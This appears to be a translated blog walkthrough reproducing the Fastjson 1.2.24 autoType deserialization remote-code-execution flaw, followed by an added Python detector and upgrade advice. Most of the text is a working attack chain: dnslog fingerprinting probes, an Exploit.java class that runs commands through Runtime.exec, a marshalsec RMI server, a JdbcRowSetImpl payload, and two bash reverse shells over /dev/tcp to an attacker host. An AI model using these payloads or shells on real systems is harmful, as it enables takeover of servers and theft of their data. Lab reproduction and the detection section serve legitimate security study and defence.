Fastjson deserialization vulnerability reproduction

Introduction:

FastJson is a Java library that converts Java objects to JSON and, of course, JSON strings back to Java objects.

While parsing JSON, FastJson supports an @type field that names the class to deserialize into, and it calls that class's set/get methods to populate the properties. When the component has the autoType feature enabled and deserializes untrusted data, an attacker can craft input that abuses this.

Detailed description

When FastJson's autoType handles a JSON object, the @type field is not fully validated. An attacker can supply a dangerous class, have it connect to a remote RMI host, and execute code through the malicious class that gets loaded. This yields remote code execution, exposes sensitive server information, and can be used to tamper further with server data.

Fingerprinting fastjson:

1. Error-message echo: with default configuration, if the submitted JSON is not properly closed, fastjson reports a parse error and the word "fastjson" appears in the response.

2. Blind check via dnslog: submit one of the probes below and see whether a DNS lookup for the dnslog hostname arrives.

Before version 1.2.67

{"zeo":{"@type":"java.net.Inet4Address","val":"745shj.dnslog.cn"}}

After version 1.2.67

{"@type":"java.net.Inet4Address","val":"dnslog"}

{"@type":"java.net.Inet6Address","val":"dnslog"}

Malformed variant:

{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}

POC:

Nested inside a key (zeo here):

{"zeo":{"@type":"java.net.Inet4Address","val":"dnslog"}}

{"@type":"java.net.Inet4Address","val":"dnslog"}

{"@type":"java.net.Inet6Address","val":"dnslog"}

{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}

{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}

{ {"@type":"java.net.URL","val":"dnslog"}:"aaa"}

Set[{"@type":"java.net.URL","val":"dnslog"}]

Set[{"@type":"java.net.URL","val":"dnslog"}

{ {"@type":"java.net.URL","val":"dnslog"}:0

Fastjson 1.2.24 deserialization vulnerability reproduction:

Host A: the host running the vulnerable fastjson version

Host C: the host serving RMI/LDAP

Host B: the host serving the constructed malicious class (containing the commands to execute)

The remote command execution flow as a whole:

1. The attacker sends the payload to host A (the payload specifies the RMI/LDAP address).

2. Host A triggers the deserialization vulnerability and makes an RMI remote call to host C.

3. The RMI service on host C tells host A to load the malicious Java class from host B, so host A ultimately loads and runs the class from host B via host C's RMI service.

4. Host A executes the malicious system command.

Reproduction steps

Install the JDK on Kali (the old 8u20 build is used because later JDK 8 updates block loading of remote classes through RMI by default):

cd /opt
curl http://www.joaomatosf.com/rnp/java_files/jdk-8u20-linux-x64.tar.gz -o jdk-8u20-linux-x64.tar.gz
tar zxvf jdk-8u20-linux-x64.tar.gz
rm -rf /usr/bin/java*
ln -s /opt/jdk1.8.0_20/bin/j* /usr/bin
javac -version
java -version

Compile the malicious class:

javac Exploit.java

The source of Exploit.java is as follows:

import java.lang.Runtime;
import java.lang.Process;

public class Exploit {
    // Static initializer: runs as soon as the class is loaded by the target JVM,
    // which is exactly what the RMI reference causes to happen.
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            // Command run on the target; creates a marker file as proof of execution.
            String[] commands = {"touch", "/tmp/hel10"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

Then start a web server in the directory containing Exploit.class so that the RMI service can fetch the malicious class.

Then start the RMI server (marshalsec), pointing it at the hosted class:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.88.133:8888/#Exploit" 9999


Then send the payload to the target host:

{
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "rmi://192.168.88.133:9999/Exploit",
        "autoCommit": true
    }
}

The target host triggers the deserialization vulnerability and makes an RMI call out to the VPS. The RMI reference points at the malicious Java class hosted on the VPS, so the target remotely loads and runs that class through the RMI service.

For a reverse shell instead, change the command array in the malicious class to one of the following:

"/bin/bash","-c","exec 5<>/dev/tcp/192.168.88.133/1234;cat <&5 | while read line; do $line 2>&5 >&5; done"
"/bin/bash", "-c", "bash -i >& /dev/tcp/192.168.88.133/1234 0>&1"
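The fingerprinting probes and the JdbcRowSetImpl payload shown above are easy to spot on the wire if something looks for them before the parser does. The detector below is an added example, not code from the original post: it scans request bodies (or bodies copied from an application or WAF log) for @type fields and rmi://, ldap:// lookup targets, grades each hit against the class names used on this page, and deliberately works on the raw text, because several of the fingerprinting probes are not valid JSON and a detector that json.loads() first would never see them. The class sets, the Finding structure and the sample bodies (documentation IP 192.0.2.10, placeholder hostname example.dnslog.invalid) are my own construction.

```python
"""Flag Fastjson @type probes and JNDI-style payloads in untrusted request
bodies. Added example for this page, not code from the original post.

Regex-based on purpose: several of the fingerprinting probes on this page
are not well-formed JSON, so a detector that parses the body first and
then inspects the object never sees them."""
import json
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Class names taken from the probes and the RCE payload discussed on this page.
PROBE_CLASSES = {
    "java.net.Inet4Address",
    "java.net.Inet6Address",
    "java.net.InetSocketAddress",
    "java.net.URL",
}
GADGET_CLASSES = {"com.sun.rowset.JdbcRowSetImpl"}

# "@type" key followed by a fully qualified Java class name; tolerant of
# whitespace and of whatever (possibly broken) JSON surrounds it.
TYPE_RE = re.compile(r'"@type"\s*:\s*"([A-Za-z_$][\w.$]*)"')
# JNDI lookup targets of the kind carried in dataSourceName.
JNDI_RE = re.compile(r'\b(?:rmi|ldaps?)://[^"\s]+', re.IGNORECASE)


@dataclass
class Finding:
    severity: str                      # "info", "medium" or "high"
    reason: str
    classes: List[str] = field(default_factory=list)
    jndi_urls: List[str] = field(default_factory=list)


def parses_as_json(body: str) -> bool:
    """True if the body is well-formed JSON (many of the probes are not)."""
    try:
        json.loads(body)
        return True
    except ValueError:
        return False


def scan_body(body: str) -> Optional[Finding]:
    """Return a Finding for a suspicious body, or None if nothing stands out."""
    classes = TYPE_RE.findall(body)
    urls = [m.group(0) for m in JNDI_RE.finditer(body)]
    if not classes and not urls:
        return None
    if urls or any(c in GADGET_CLASSES for c in classes):
        return Finding("high", "known deserialization gadget class or JNDI lookup URL",
                       classes, urls)
    if any(c in PROBE_CLASSES for c in classes):
        return Finding("medium", "Fastjson fingerprinting probe (name-resolving class)",
                       classes, urls)
    return Finding("info", "@type present in untrusted input", classes, urls)


def scan_batch(bodies: List[str]) -> List[Optional[Finding]]:
    """Scan several bodies; one entry per body, None for clean ones."""
    return [scan_body(b) for b in bodies]


# Constructed sample bodies (not captured traffic): 192.0.2.0/24 is a
# documentation range and example.dnslog.invalid is a placeholder hostname.
SAMPLE_BODIES = [
    '{"name":"alice","age":30}',                                   # benign
    '{"zeo":{"@type":"java.net.Inet4Address","val":"example.dnslog.invalid"}}',
    '{"@type":"java.net.InetSocketAddress"{"address":,"val":"example.dnslog.invalid"}}',
    '{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
    '"dataSourceName":"rmi://192.0.2.10:9999/Exploit","autoCommit":true}}',
    '{"@type":"com.example.app.User","name":"bob"}',               # unknown class
]

if __name__ == "__main__":
    for body, finding in zip(SAMPLE_BODIES, scan_batch(SAMPLE_BODIES)):
        shape = "valid-json" if parses_as_json(body) else "malformed "
        print(shape, finding.severity if finding else "clean ", body[:60])
```

Run it as a script to see each constructed body graded; note that the InetSocketAddress probe fails json.loads() yet is still flagged. Detection like this is a compensating control only: the actual fix is to upgrade fastjson and keep autoType disabled (fastjson 1.2.68 and later add safeMode, enabled with ParserConfig.getGlobalInstance().setSafeMode(true) or -Dfastjson.parser.safeMode=true, which rejects @type entirely).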

Source: blog.csdn.net/weixin_52501704/article/details/128521090